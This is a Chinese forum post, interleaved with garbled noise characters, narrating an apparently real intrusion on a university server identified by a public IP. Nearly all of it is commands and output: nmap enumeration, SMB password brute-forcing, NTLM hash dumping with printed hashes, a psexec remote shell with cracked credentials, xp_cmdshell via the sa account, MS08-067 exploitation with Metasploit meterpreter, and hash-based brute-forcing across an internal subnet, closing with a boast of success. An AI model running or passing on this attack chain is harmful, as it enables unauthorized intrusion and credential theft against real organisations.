广西师范网站http://202.103.242.241/& Q1 Z; |4 `. Z2 q. h% G8 S
2 D1 H1 _( v- e" kroot@bt:~# nmap -sS -sV 202.103.242.241, T4 X/ E5 n9 |: R
/ Y7 x! a" u- Q' D6 vStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST8 p- V% m5 B1 d! [
" b+ |2 _+ B: A: ^" m* R
Nmap scan report for bogon (202.103.242.241)# f9 O% l0 I+ d1 D0 U) L
" ~" B# M- C& H( g0 U& a% ZHost is up (0.00048s latency).
' y. ^0 S& o2 j" U9 z, w
/ |. s3 [3 W* [5 Q7 w) tNot shown: 993 closed ports5 X( X. o- M6 N
5 v7 M; T# t) e) M: u3 g% MPORT STATE SERVICE VERSION
, [( m& |" ]6 R: t. {/ p1 f: j! ?) M3 R: }
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
8 t b, M5 s! n* E% r& ^
( U* `8 A0 m# F N H9 T/ u' `) H139/tcp open netbios-ssn f& _3 W3 _3 ]6 O0 H# M
: K5 J! k) L/ |$ e7 v+ C3 Q445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
, X; V1 E; U+ {, T( _0 D1 \. Q! j0 j, S1 l, N( V
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
* \' T4 l) F" p7 k8 \! l* Y" i# I0 C. h _& V8 @: p" i7 I* ?
1026/tcp open msrpc Microsoft Windows RPC
$ q) w8 `: i! p' m! O; F
9 |2 f8 e9 P' p6 O; d3372/tcp open msdtc?
R+ ?6 K0 F/ ~ C( r7 }( j0 i- O7 }( Y& ^( e$ w v- T
3389/tcp open ms-term-serv?
3 A7 `# H% S/ s' ^3 p
; k9 Q! P }# I$ |8 w1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
( l/ G; `9 _' ]# |6 P& gSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
1 d$ j0 } [" B. O; m/ }2 P/ F/ U* L7 S/ I/ f' I
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions0 `8 S" r2 i5 Q2 m$ ~- S' e5 d
8 q ]* F; ~6 M
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
) F: T; v# k @
+ L* u% w3 K' S4 I5 ISF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
8 H Z" ~1 f! V! [* ~) W& ?9 S0 a
% _) t6 O6 p( X+ e% FSF:ptions,6,”hO\n\x000Z”);! u9 @) |3 N* \* V/ E x% ?: s
! E0 a4 t( B3 dMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
4 X+ B( a( d# v+ e6 T4 X( S$ A# q
" m, n7 K" @0 kService Info: OS: Windows8 g% g/ x; ]" E0 }% f. U
% ~7 b. G& E* f0 jService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
$ `: y3 g& W2 b. O+ m1 x8 a
5 p2 d+ I; F4 J$ Z4 ^ aNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
% w/ s' ~' V/ |8 e5 I/ c% W0 G& s( L
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本$ Y: T e% A4 q
5 [( H& z1 |- M/ y, u# B0 F
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
: {! U4 q y' ?2 s1 n/ B5 ^8 e& A/ c+ z& H9 N" z) ^
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse( G! E6 X# s+ H% {1 X
' G T- r: o/ ~, z1 ]
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse0 n9 F! `1 s$ \
- y! `5 m% _. s3 a-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
! K2 l8 }$ M5 t9 w& T1 y# O; E
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse/ q- E K4 L3 w3 I" f, x
* C0 G9 {5 Y( @8 x2 E
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
$ y! r# F3 s: U& f! g! j
& d" r3 u; j# t' z5 W-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
! I# Y* l; z8 h" b& m8 M; ]+ T- w6 Y* L6 O3 E9 A/ H0 {
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
8 o! ~, E" T) J% [6 a
z1 g. s+ K1 _) E" K-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse' \ `: L1 u* P/ ?) `* A
5 t: Z5 {" Z( x" N
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse& h, O% p5 T# @" P% a' r
, D/ {. O1 z+ x ^$ {2 A b& _+ c" d
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 c; n) g. t' G9 k% e6 Z/ F6 I$ J
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
5 @ ]' {) U# q0 Z( |" y) j, l. v/ x1 ?' ?1 m* ~
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse) T3 R1 D( w2 K
: M, w/ l" J8 |% Y: R. u/ v-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
9 w6 O2 P( R, k* Z( W* u% D7 G
5 l/ p7 ?: I3 T9 I0 Z-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
% L# a8 G) O4 j) S' H& ` L6 ~$ N+ m
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
) ]7 @' |+ @" P) k6 [; w( W; }0 X- Q# E! R+ ?/ @) F
//此乃使用脚本扫描远程机器所存在的账户名& U4 j7 n2 E! c7 b; i% y" `
! x t( {5 ~* a; T3 w! d2 y+ \Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST. p6 V# `+ V' r& W J9 S
* F3 d* a6 G( d
Nmap scan report for bogon (202.103.242.241)
. d, u9 ^: X* i* D! e* k! I9 M# w: h
" T" C' n# P K, m! rHost is up (0.00038s latency).% w9 B0 p! B% a# h% v; [" j" o
c% e9 \- p! C* I0 ~
Not shown: 993 closed ports; E0 v/ u' n) Q2 g) z3 ?: @
# ~3 J! C+ t e! F! Y. \PORT STATE SERVICE/ K& K* ]$ M1 M8 g
! W# O% L1 }: q5 ]1 i$ Y( M135/tcp open msrpc
* s5 I7 H" J0 h7 d4 ? y7 T {" t9 D
139/tcp open netbios-ssn( N. C% [" f' _0 o) P1 @$ a6 X
% f* x$ m/ X' q0 T6 K9 o* d5 K
445/tcp open microsoft-ds2 g. h( X, W) Y2 L! R+ w" M
) l$ ?" d: R1 }! @. a1025/tcp open NFS-or-IIS
" h; F0 ]- E1 v" C5 u- [
2 P C4 ~& j+ b8 F6 Y1026/tcp open LSA-or-nterm
7 s! z, p2 X3 N. z6 }9 e6 P4 P' q9 V, w# B6 [! H7 U/ u" ?% p
3372/tcp open msdtc
- r8 L& @$ Z7 K% [
2 M& N! W) z3 u1 m5 T3389/tcp open ms-term-serv
V7 y; b7 j7 ~* ^5 F, j5 n
; G f* P* w3 B5 jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ q1 p5 l& {! W2 v5 V( l- a. T$ [9 O+ S$ G, t A( B) K' A
Host script results:
: a6 p1 P- P' C. h8 M9 ~- f. P1 W3 y1 S3 z) I% k: \9 W
| smb-enum-users:
" ]2 a7 d' ^9 b% T T- T$ q1 s9 q& @/ P$ u% B4 b
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果" x* A9 a: M- | p( K
1 ?. Q& H+ P# n. S4 p$ c
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds6 O* K0 r" a8 V- a A
( o! M9 ?9 r: @5 Y, B, L* i: Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 & K( U- k0 O/ c) C8 W
. P; a/ k* w: U1 J. A! O
//查看共享+ c7 Y" R4 ? u9 l: `) a: n
# Q& W0 T' |7 E, @* e# B, Y; j0 A
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST1 p- M f5 w* q" N: u8 g: E
# |4 u2 s" Z' ?0 Q# V9 gNmap scan report for bogon (202.103.242.241)2 f; z' f9 w0 f1 }
) }+ a7 T8 P' bHost is up (0.00035s latency).$ t6 w# f; l! Y$ H
% p7 f5 F, B nNot shown: 993 closed ports
( |- O/ V `7 B! j6 a/ { q4 p: m9 O( M3 F" O+ D
PORT STATE SERVICE
; m" h% b4 w3 O+ Y. u
( h! @+ O! j! D) @; u135/tcp open msrpc
4 m3 p Y* w X. s+ b
% r5 E! n9 h2 {& u/ D139/tcp open netbios-ssn
! a& G/ r% o3 O) H% U/ [' \. [( \0 m& s6 b! b
445/tcp open microsoft-ds2 o, Q3 A6 |" M: O, _5 G4 Q2 s
1 } K' r6 C. |; Q( _& Q$ W$ j
1025/tcp open NFS-or-IIS, a. r0 \% R/ t
$ Z) t: n, r; C9 o4 R" d1026/tcp open LSA-or-nterm4 y8 O; K" _ D/ w: a2 ] g5 o
, M! l" I( | O3372/tcp open msdtc5 H/ H; |0 u% L* @0 _. G6 V
4 {+ G( j6 `) s" o
3389/tcp open ms-term-serv* P4 T3 c# n. ]" X
- k5 I& z1 K( A4 r* i7 H1 M, r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. z s h6 z/ O. t9 ~4 e
- m3 D; Q% m2 U& w" g( @& \Host script results:
: u- L( X8 B0 L; T. j% u& q+ j6 T0 H7 ^5 E$ d) X. ?4 c8 ]# @
| smb-enum-shares:
) h' I0 P: k% z5 l5 @4 n( U3 x& x8 f% h1 D4 X6 h; B0 u
| ADMIN$8 ^: G1 S: h2 \1 ~& u
. a$ o3 A! }* k) g, f2 w' Y; B D
| Anonymous access: <none>1 M8 r" z$ z1 a
5 i1 H/ E( n( x. i3 F| C$
: s( _: g1 A7 e8 a. ?# p' _; H$ | q$ j; J6 ^ a3 _
| Anonymous access: <none>
- c5 t# s% n, G/ m1 i: c5 X/ y6 c$ o; ?
| IPC$1 y; c1 t3 S2 D
: g+ [7 Y5 [* O' {0 J2 n' s|_ Anonymous access: READ% I+ a0 {+ ?1 w, i1 e+ z: w8 \" F
" O- |, Z# f# R% _% }Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
" _% L: T+ U* L+ e/ b/ x$ G# V; M( d+ u( M+ {( e' e9 f. ]$ b
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
) c3 u z' b6 d3 u2 W% L1 V
$ O2 K5 }, b+ R* U//获取用户密码
1 v9 {9 B7 p% }
2 U L2 e3 ^- e/ l9 n" l5 QStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST/ u$ z$ t8 z5 F4 ^, j( T1 n
% ]) e! z' M0 r, _; s7 l3 e$ E
Nmap scan report for bogon (202.103.242.2418); W) d5 I2 q# Y; s1 _
# V3 G$ g6 E0 Z2 h
Host is up (0.00041s latency).3 \2 T" x" G8 L& g# H
9 a, f8 F& T; lNot shown: 993 closed ports! u" l& a2 D9 n9 T7 H0 D/ I' }
! y5 z6 I9 k3 M: jPORT STATE SERVICE# S$ { T3 d8 Z3 r8 `
0 A' p: T8 Q* a' o0 S0 L
135/tcp open msrpc/ |3 H4 h. b: Q
7 n9 g% v+ w' _$ Q: t
139/tcp open netbios-ssn
8 s) j: O9 t5 C7 O( d3 ^, [- N
}' I6 h! v1 V9 H445/tcp open microsoft-ds/ R7 ~2 m( J! c5 d1 c
9 V! \7 t& q- P1 I: Q# w4 Q% R
1025/tcp open NFS-or-IIS! |/ m5 r1 I1 h m
6 n9 m8 h% T6 \: z$ I
1026/tcp open LSA-or-nterm
/ {) c1 X. A, v3 \& a
2 U+ G1 j1 x+ b7 u: _/ o3 T0 M" H2 n2 C3372/tcp open msdtc
7 X, y2 d( U2 _3 }0 b' r) L" b" j0 [
3389/tcp open ms-term-serv
7 T" ^( D- I/ Q E& h) P$ u6 }
' k: ?, z) F# I. a; qMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; s2 j4 O% g$ y* M9 f( k3 z& q
Host script results:, l T) P/ Q% W
. F, Z3 s, |4 S2 \* _9 D+ \8 D
| smb-brute:
2 O- v* J7 z' {# F5 V( D0 g7 C& Y% x' d9 r0 C: x, @. l* E
administrator:<blank> => Login was successful; y% R" O$ d& }- o5 M# y5 `
: ^* e0 h: O* ^- }|_ test:123456 => Login was successful- {% _* }" x: s* ]
. d# J7 R' n) w; Y& `
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds! T0 w/ z. @; E, W0 ^9 e N+ t
1 g; W5 e6 G' H' s6 R) ^
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
7 z8 N! i5 E1 [
$ r% |4 X9 p/ d7 M# E; ~root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data. X0 H5 p6 z3 ]* ]
$ P& @" Q% i- e) R; ?
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse/ E: _8 q H2 w- `4 r
& a* v! H9 E; u( N- }root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
, f1 i* t! v% C
( r1 W+ B4 D r- s9 P/ ^ rStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST3 f0 j m. M& b8 T! c/ E
+ J* h4 g7 T1 J2 S5 o
Nmap scan report for bogon (202.103.242.241)9 N& c% ^2 ^+ `" `* E$ A9 Q4 u8 {
& J1 @& K: {+ p% p7 P1 M' u
Host is up (0.0012s latency).! b T( f0 w, K0 ~9 f7 f
+ u1 U- _% |% S5 N$ T" s `
PORT STATE SERVICE
- ^+ }9 T, u. W. m, @
4 t7 Y$ t4 A8 u) C \/ X135/tcp open msrpc
8 e! T6 T$ N+ q# u6 ^
# A8 S; a: f. H- z1 B, G139/tcp open netbios-ssn5 q' \/ S( T& c: p. v6 J/ C) D
7 a$ ?# J* ~; `445/tcp open microsoft-ds
7 e7 Z( D% B- T2 p: x' d6 X4 F$ R2 d- n8 [
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: V- w6 ]# @5 g$ F9 J& e
0 J) r4 H! t6 s& t |) L9 KHost script results:( U: n) }& Y% d
" u" S' i: B, [% ?5 }| smb-pwdump:
7 e1 k" f: g2 s/ |0 L
0 q+ k0 f0 g: e4 a: {| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
# C( f/ K: q7 {9 k( j' n6 e& {3 j% `' X! Y% D- x9 U
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
" |. |5 ^+ _% R' i$ P0 `
) X+ \4 M }2 k" \| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4( L, P% c% ~1 [
/ _1 r6 Y' L) L" _
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2! P, `2 R- N& r7 {8 c
5 l6 h, I3 Y0 `: v2 o( WNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
; H: X: D% r) [3 s1 [$ K, L% }" @5 b+ e6 t
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell2 K- R$ W9 b1 O3 h" C
. L7 n, i& ~- [9 r% P0 S" |-p 123456 -e cmd.exe# Q) a9 B: P) V D. T4 c) Q
* y: e; i$ r& H2 M" iPsExec v1.55 – Execute processes remotely! |9 ?8 r/ j4 o' l! q2 }
# ~4 M8 O1 M* |4 R: u: fCopyright (C) 2001-2004 Mark Russinovich
7 k1 Y/ V+ B0 X: b9 X5 \
8 r( h/ J7 g9 ]) \9 NSysinternals – www.sysinternals.com
1 @: Y8 u- a: f
& m& e1 j# I' w, l# O2 nMicrosoft Windows 2000 [Version 5.00.2195]
7 J& O' w4 M" f7 C: [
" _' W7 c; s. J; Q( L* f(C) 版权所有 1985-2000 Microsoft Corp.
6 v0 A4 X% l6 m& k( u6 _3 L/ g8 {- s t. m5 ?4 d: Y5 s/ v$ o
C:\WINNT\system32>ipconfig
2 N: X. K* [5 g# `' d8 Z- L* P z0 X% ^. Z
Windows 2000 IP Configuration
3 B, K' g% ?( X* T6 e& ~, x' }1 R
7 x. g! g2 g8 Z) REthernet adapter 本地连接:
3 G7 {4 R* ~5 D1 H
4 E6 ] l6 O: ]# ?- @Connection-specific DNS Suffix . :2 H3 x' L; g* t6 _- r! D# b1 v5 q O# ~
) O- c/ P$ Z- f5 O( {9 \ U
IP Address. . . . . . . . . . . . : 202.103.242.241& J9 K; c0 U) C" I4 Y. @
% J: m4 K. J# p5 A5 D
Subnet Mask . . . . . . . . . . . : 255.255.255.0( @0 v7 P, e& p) r9 T: |, \+ V& @
0 H% J1 z4 a7 M; Y! N0 D }Default Gateway . . . . . . . . . : 202.103.1.1) V8 y, w+ V0 n6 O; O( n
9 P5 x5 C( J: f0 S: b% H; JC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令. X8 U. A! V& n) s3 T7 w6 p
) C9 `3 {$ C1 l( K: g' O
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞+ U! P$ E: K6 a- P* `' q
0 {& p$ E- o! ?3 N9 G! _% OStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST9 k: _2 C, k( H. g' S
* t; e/ K4 g4 H' z: x8 M# dNmap scan report for bogon (202.103.242.241)
6 p( L/ P/ b' ~
7 |( J& F* p( iHost is up (0.00046s latency).( S" c% k, J4 r: j
+ c5 T/ _# r. S& YNot shown: 993 closed ports
* ^$ z% ?! g0 B6 I* e0 O: K2 t1 e% r2 E
PORT STATE SERVICE
: u( P4 O% I9 y6 ?( c4 C! r6 F$ P9 |; Y) m( o$ \6 b5 c+ Y
135/tcp open msrpc2 F+ @, e5 H; }+ ]& ]
& q2 i+ M$ l' R8 z139/tcp open netbios-ssn
' z- c9 B3 |6 B; o; l/ W% R# L
6 ]' O! t9 L' i5 s445/tcp open microsoft-ds
" G! j/ i8 z7 V; \6 y' G% W4 [6 L) m& F/ z1 }" \- \7 b
1025/tcp open NFS-or-IIS
$ O% S {9 J" K" {
T3 p) F0 u$ I8 t7 M1026/tcp open LSA-or-nterm5 ~+ X2 x* {6 _) a+ j
; ?( O3 j& P7 P7 w
3372/tcp open msdtc
' K3 p7 f& A+ d( l( D% m$ t8 ^" A2 s% [, h6 y6 |
3389/tcp open ms-term-serv
1 S! O) \- ~% E+ c1 u/ D
4 Y7 F- e9 T. m2 ~- n5 @MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' z ?9 n* ?+ D1 Y Q
+ s o$ p6 m. q0 G- T" h0 O; B" MHost script results:9 M0 [3 W- V- r0 n1 Q l
% m( L: q% X% Q7 R7 i5 p4 K| smb-check-vulns:
1 w, D, [4 P6 i8 E# ?
0 e9 J; U6 ]0 t: ~* X5 v0 G* R|_ MS08-067: VULNERABLE
- a5 w9 H3 v2 f" |( s2 x- V! d) Z5 Z2 S+ @
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds2 W' X/ |! D1 u2 g6 K+ x
7 H5 M' m2 m. |# \root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出! @% q1 P& K# @6 j- n3 n
5 Q V3 O% S; p. mmsf > search ms08
0 s3 J1 v$ p- O0 X( m, J" p9 `
W4 M s1 O) S* s' `. R2 ?8 emsf > use exploit/windows/smb/ms08_067_netapi
6 I' Q0 h+ Z+ C2 O6 s" o' N( F; j2 U6 ~
msf exploit(ms08_067_netapi) > show options
4 x, g$ ~$ w- E* a# J7 |
3 {( a9 y$ l0 C9 y3 K: j9 Vmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
2 u7 |+ r# `5 N% I: ], Z3 i. f) R& S* ?5 q9 t7 c
msf exploit(ms08_067_netapi) > show payloads. ?/ G! O1 ?! A
% h4 e8 ?7 b6 E- G# Q
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp7 ?$ U$ |. h' k) t
* C; s7 M1 [5 z% h1 a& U) P! o
msf exploit(ms08_067_netapi) > exploit: c& S* \! w N: K6 K; n1 C. Q
6 v. ~) |( u; b. d' B
meterpreter >
3 f3 Y- u8 d4 c3 I* }, K7 J+ d y0 T
Background session 2? [y/N] (ctrl+z)
9 n4 j+ @3 I7 ^% ]/ S
4 e% k8 s* `9 I2 u& kmsf exploit(ms08_067_netapi) > sessions -l
9 x$ W% ]$ b S1 K. r9 a8 a
$ M) u7 Y' c7 t5 R( Qroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt* ~. b/ F X# A* z" C8 f
5 L/ S( Q# G& N$ @4 I$ \test
5 W! b2 y+ r+ c1 ?7 x* @, h8 i( [- F) T3 \# f6 q
administrator
0 F; _0 Y/ r. G- s7 b
* V I4 K. p4 ]+ U( J3 C! ^root@bt:/usr/local/share/nmap/scripts# vim password.txt/ O/ [) w# r. L$ b$ F
1 l4 j+ W( u+ J2 m. G3 m
44EFCE164AB921CAAAD3B435B51404EE T5 W* _: v, G. }
2 Z; v m+ f$ U0 g1 zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ) [4 i3 g: @8 W& a* Q. Y8 i
/ J. W( K/ y1 o- u
//利用用户名跟获取的hash尝试对整段内网进行登录! X7 @' B8 ?# e5 _8 A9 C( K
, \3 \6 h7 P0 Z; C! j( zNmap scan report for 192.168.1.105& Y& Y. a. q& l# c7 Z
$ _& Z: I" Z4 x t
Host is up (0.00088s latency).
2 ~4 L, a. Q) E/ I0 p( M6 [
' B% B) _' ^1 g7 W- ~8 k* z& vNot shown: 993 closed ports0 i* {- u- F# d$ R
: w4 E7 V/ {( \# S! B
PORT STATE SERVICE+ B! L* [! L. Y9 u
; D9 `. L# |( ~+ W+ ]
135/tcp open msrpc
; u7 P3 ~: ~. s5 r5 `% d. _$ J, }
4 ^' y! _( Y6 M5 Z139/tcp open netbios-ssn
# ]$ ?7 `/ ~8 u { R$ U$ H5 w" k" u6 m" o6 J
445/tcp open microsoft-ds
/ v1 v; a, A3 O
9 U( d( Q Z: B+ F* S- H& Y; L- D7 s! m1 e1025/tcp open NFS-or-IIS- q" s! F1 ?7 i% d
* G5 U& B" t: C( B+ z% S. C7 X% `* M1026/tcp open LSA-or-nterm: ^& Y& o/ t `! @ S- F% j
* W: b* J x" ?$ v3372/tcp open msdtc4 X8 G0 M1 ]$ A4 \. w
' s3 L* |; ~5 |3389/tcp open ms-term-serv2 T: }+ R m0 j! [+ a+ g1 n9 k2 I
5 j, [8 {$ C5 uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# H/ O* O4 n+ ?1 t1 \) A6 s" T
, r2 K+ T z6 Y: W" Q0 H- R: iHost script results:* s8 U% h# o4 a/ ~
& F4 D/ P. L4 A+ Z/ Z. Q0 @
| smb-brute:7 M4 B) D* m+ O2 P8 c% a* R2 y/ W
9 \4 e) s& o/ R" ?' f|_ administrator:<blank> => Login was successful
; H! k1 ] J t; [: J
3 u1 d& {3 @5 Y7 ~6 h, l攻击成功,一个简单的msf+nmap攻击~~·
. X6 S' M$ E: c
" z! c5 X& V& ]4 d {3 [ |
发表于 2012-12-4 12:46:42
收藏
支持
反对